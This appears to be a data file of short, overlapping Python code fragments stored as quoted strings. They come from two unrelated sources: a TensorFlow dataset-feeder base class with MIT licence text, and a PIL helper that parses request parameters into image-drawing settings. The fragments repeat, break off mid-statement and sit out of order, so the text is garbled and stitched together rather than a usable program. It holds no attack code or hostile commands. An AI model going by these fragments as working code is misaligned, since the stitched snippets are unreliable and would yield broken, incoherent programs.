Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\"", "generation methods :param cluster_config: Optional. 
If set, the cluster configuration will be used", "copyright notice and this permission notice shall be included in all # copies", "\"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts", "item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the", ":param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError()", "\"\"\" Makes sure the item respects the required protofields and casts/pads the item", "feature in self.proto_fields, 'Feature %s is not in proto fields.' % feature proto_field", "NOTICE: Permission is hereby granted, free of charge, to any person obtaining #", "proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not", "**kwargs): \"\"\" Computes the outputs of a name using item as inout :param", "where to put the item :param item: A dictionary with the fields required", "missing self.session = None self.iterator = None self._is_started = False self._is_initialized = False", "queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name using item", "iterator) :param session: The TensorFlow session to use. 
:type session: tensorflow.python.client.session.Session \"\"\" raise", "start(self, session): \"\"\" Starts the dataset :param session: The TensorFlow session to use.", "feeding data inside a model \"\"\" from abc import ABCMeta, abstractmethod import logging", "if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len - Converting and flattening", "@abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and its iterator) :param session:", "lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len - Converting and", "def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self):", "sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len -", "\"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\"", "if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif", "= BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as default if features", "Constructor :param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation methods", "limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or", "features are missing self.session = None self.iterator = None self._is_started = False self._is_initialized", "as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list #", "use. 
:type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls", "@abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a", "the results when they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\"", "% feature proto_field = self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set):", "\"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops", "merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to", "the Software is # furnished to do so, subject to the following conditions:", "subject to the following conditions: # # The above copyright notice and this", "= np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField):" ]
[ "def analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] =", "params['opacity'] = opacity(obj) params['original'] = o if (o := obj.get('original')) else False params['colour']", "try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]),", "Exception as ex: print(str(ex)) return shapes def text(obj): texts = list() if texts_args", "len(data) >= 2: return [data[0], data[1]] return None def colour(obj): data = params.split(',')", "from PIL import ImageFont def analysis(obj): params = dict() params['size'] = size(obj) params['rgb']", "7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj):", "[int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg =", "'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] =", "[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >=", "7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6:", "except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list()", "obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]]", "= lines_args.split(';') for i in line_args: try: line_arg = i.split(',') if len(line_arg) >=", "[data[0], data[1]] return None def colour(obj): data = params.split(',') if (params := obj.get('colour'))", ">= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], 
(int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >=", "params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] =", "bg = None if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >=", "int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)])", "else None return None def album(obj): data = params.split(',') if (params := obj.get('album'))", "= rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g')", "int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])),", "2: return [data[0], data[1]] return None def colour(obj): data = params.split(',') if (params", "PIL import ImageFont def analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] =", "None: return op if 0 <= (op := int(a)) <= 255 else None", "ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args :=", "if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b')", "(int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg = None if not obj.get('store')", "# ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg =", "= color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles')", "2: bg_args = [bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args =", ">= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), 
int(shape_arg[3])), (0, 0, 0), (0, 0, 0)])", "shapes def text(obj): texts = list() if texts_args := obj.get('texts'): text_args = texts_args.split(';')", "a := o if (o := obj.get('a')) else None: return op if 0", "shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]),", ":= obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for", "obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try: line_arg = i.split(',') if", "if data and len(data) >= 2: return [data[0], data[1]] return None def colour(obj):", "text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]),", "height = int(obj.get('height') or obj.get('h') or '300') return width, height def color(obj): rgb", "int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append(", "data = params.split(',') if (params := obj.get('album')) else None if data and len(data)", "opacity(obj) params['original'] = o if (o := obj.get('original')) else False params['colour'] = colour(obj)", ">= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >=", "else None if data and len(data) >= 2: return [data[0], data[1]] return None", "= list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf'", "= point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o := obj.get('original')) else", "int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( 
[(int(shape_arg[0]),", "= opacity(obj) params['original'] = o if (o := obj.get('original')) else False params['colour'] =", "colour(obj) params['album'] = album(obj) return params def opacity(obj): if a := o if", "= int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or '300')", "def store(obj): bg = None if not obj.get('store') else obj.get('store').split(',') if bg: if", "if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0), ImageFont.truetype(ttf, 30)]) return", "album(obj) return params def opacity(obj): if a := o if (o := obj.get('a'))", "len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None", "for i in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append(", "params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj)", "7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]),", "not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args = [bg[0],", "params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] =", "obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args", "(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]),", "int(data[6]))] return None def store(obj): bg = None if not obj.get('store') else obj.get('store').split(',')", "if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), 
(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]),", "False params['colour'] = colour(obj) params['album'] = album(obj) return params def opacity(obj): if a", "int(obj.get('height') or obj.get('h') or '300') return width, height def color(obj): rgb = (obj.get('rgb')", "list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf", "len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0), ImageFont.truetype(ttf, 30)]) return texts", "int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex)) return lines", "data and len(data) >= 2: return [data[0], data[1]] return None def colour(obj): data", "in text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]),", "= ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity']", "op if 0 <= (op := int(a)) <= 255 else None return None", "int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]),", "bg_args else: return None def point(obj): return None if not obj.get('point') else float(obj.get('point'))", "def size(obj): width = int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or", "= (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1]", "ttf = '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if len(text_arg) >=", "= int(obj.get('height') or obj.get('h') or '300') return width, height def color(obj): rgb =", "(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), 
int(shape_arg[1]),", "shape): shapes = list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i", "obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or '400') height", "elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if", "import ImageFont def analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] = color(obj)", "lines = list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in", "'0'] return bg_args else: return None def point(obj): return None if not obj.get('point')", "i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])),", "ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0), ImageFont.truetype(ttf,", "album(obj): data = params.split(',') if (params := obj.get('album')) else None if data and", "= store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o", "line_args: try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])),", "if (o := obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj) return", "int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append(", "int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception as ex: print(str(ex))", "len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0,", 
"params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o := obj.get('original'))", "return width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0]", "try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),", "int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception as ex: print(str(ex)) return", "'400') height = int(obj.get('height') or obj.get('h') or '300') return width, height def color(obj):", "None if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args", "rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else", ":= obj.get('a')) else None: return op if 0 <= (op := int(a)) <=", "return params def opacity(obj): if a := o if (o := obj.get('a')) else", ":= obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',')", "size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] =", "(params := obj.get('colour')) else None if data and len(data) >= 7: return [int(data[0]),", "if data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]),", "shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10:", "int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])),", "else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args", "(0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0,", "= i.split(',') if len(shape_arg) >= 10: shapes.append( 
[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]),", "rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r')", "for i in text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])),", "data = params.split(',') if (params := obj.get('colour')) else None if data and len(data)", "lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try: line_arg =", "int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),", "'300') return width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] =", "255 else None return None def album(obj): data = params.split(',') if (params :=", "float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height')", "if a := o if (o := obj.get('a')) else None: return op if", "or obj.get('h') or '300') return width, height def color(obj): rgb = (obj.get('rgb') or", "data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))]", "ex: print(str(ex)) return shapes def text(obj): texts = list() if texts_args := obj.get('texts'):", "print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape):", ">= 2: return [data[0], data[1]] return None def colour(obj): data = params.split(',') if", "0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0,", "if (o := obj.get('a')) else None: return op if 0 <= (op :=", "= list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in line_args:", "0, 0)]) except Exception as ex: print(str(ex)) return shapes def 
text(obj): texts =", "def colour(obj): data = params.split(',') if (params := obj.get('colour')) else None if data", "int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)])", "= None if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2:", "except Exception as ex: print(str(ex)) return shapes def text(obj): texts = list() if", "'200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if", "point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o := obj.get('original')) else False", "int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or '300') return", "ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',')", "i in line_args: try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]),", ">= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))])", ">= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4:", "params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses')", "params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o if", "bg_args = [bg[0], '0'] return bg_args else: return None def point(obj): return None", "return [data[0], data[1]] return None def colour(obj): data = params.split(',') if (params :=", "len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), 
(0, 0, 0)]) except Exception as", "obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]),", "4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except", "= '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if", "o if (o := obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj)", "else None: return op if 0 <= (op := int(a)) <= 255 else", ":= obj.get('album')) else None if data and len(data) >= 2: return [data[0], data[1]]", "obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i", "analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj)", "line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store']", "if bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args if", "def line(obj): lines = list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for", "params['original'] = o if (o := obj.get('original')) else False params['colour'] = colour(obj) params['album']", ">= 2: bg_args = [bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args", "= i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf,", "(int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0,", "return None def album(obj): data = params.split(',') if (params := obj.get('album')) else None", "data[1]] return None def colour(obj): data = params.split(',') if (params 
:= obj.get('colour')) else", "= [bg[0], '0'] return bg_args else: return None def point(obj): return None if", "= rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj):", ":= int(a)) <= 255 else None return None def album(obj): data = params.split(',')", "None def point(obj): return None if not obj.get('point') else float(obj.get('point')) def size(obj): width", "4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex))", "(int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0,", "dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj,", "obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or '300') return width, height", "if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf =", "text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in", "int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args := obj.get('lines'): line_args =", "'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj)", "None def album(obj): data = params.split(',') if (params := obj.get('album')) else None if", "if (params := obj.get('album')) else None if data and len(data) >= 2: return", "return None def colour(obj): data = params.split(',') if (params := obj.get('colour')) else None", "10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif", "width, height 
def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if", "return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg", "def text(obj): texts = list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') #", "list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try:", "def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r')", "return bg_args if len(bg) >= 1: bg_args = [bg[0], '0'] return bg_args else:", "obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',') if", ":= o if (o := obj.get('a')) else None: return op if 0 <=", "len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >=", "None def store(obj): bg = None if not obj.get('store') else obj.get('store').split(',') if bg:", "params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj,", "bg_args = [bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args = [bg[0],", "ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf,", "= size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles']", "elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception", ":= obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj) return params def", "ellipse_and_rectangle(obj, 'ellipses') 
params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point']", "'/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if len(text_arg)", "obj.get('a')) else None: return op if 0 <= (op := int(a)) <= 255", "obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if", "obj.get('album')) else None if data and len(data) >= 2: return [data[0], data[1]] return", "def point(obj): return None if not obj.get('point') else float(obj.get('point')) def size(obj): width =", "shapes = list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i in", "params def opacity(obj): if a := o if (o := obj.get('a')) else None:", "= rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b')", "def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';')", "if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try: line_arg", "obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g') rgb[2] =", "texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]),", "else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]), int(rgb[1]),", "None if data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]),", "as ex: print(str(ex)) return shapes def text(obj): texts = list() if texts_args :=", "and len(data) >= 2: return [data[0], data[1]] return None def colour(obj): data =", "if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args =", "(0, 0, 0)]) except Exception as ex: print(str(ex)) return 
lines def ellipse_and_rectangle(obj, shape):", "texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]),", "= dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] =", "= [bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args = [bg[0], '0']", ">= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)])", "return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args := obj.get('lines'):", "opacity(obj): if a := o if (o := obj.get('a')) else None: return op", "(int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]),", "(params := obj.get('album')) else None if data and len(data) >= 2: return [data[0],", "or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1]", "text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])),", "if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g') else obj.get('g')", "else False params['colour'] = colour(obj) params['album'] = album(obj) return params def opacity(obj): if", "int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except", "(0, 0, 0), (0, 0, 0)]) except Exception as ex: print(str(ex)) return shapes", "[bg[0], '0'] return 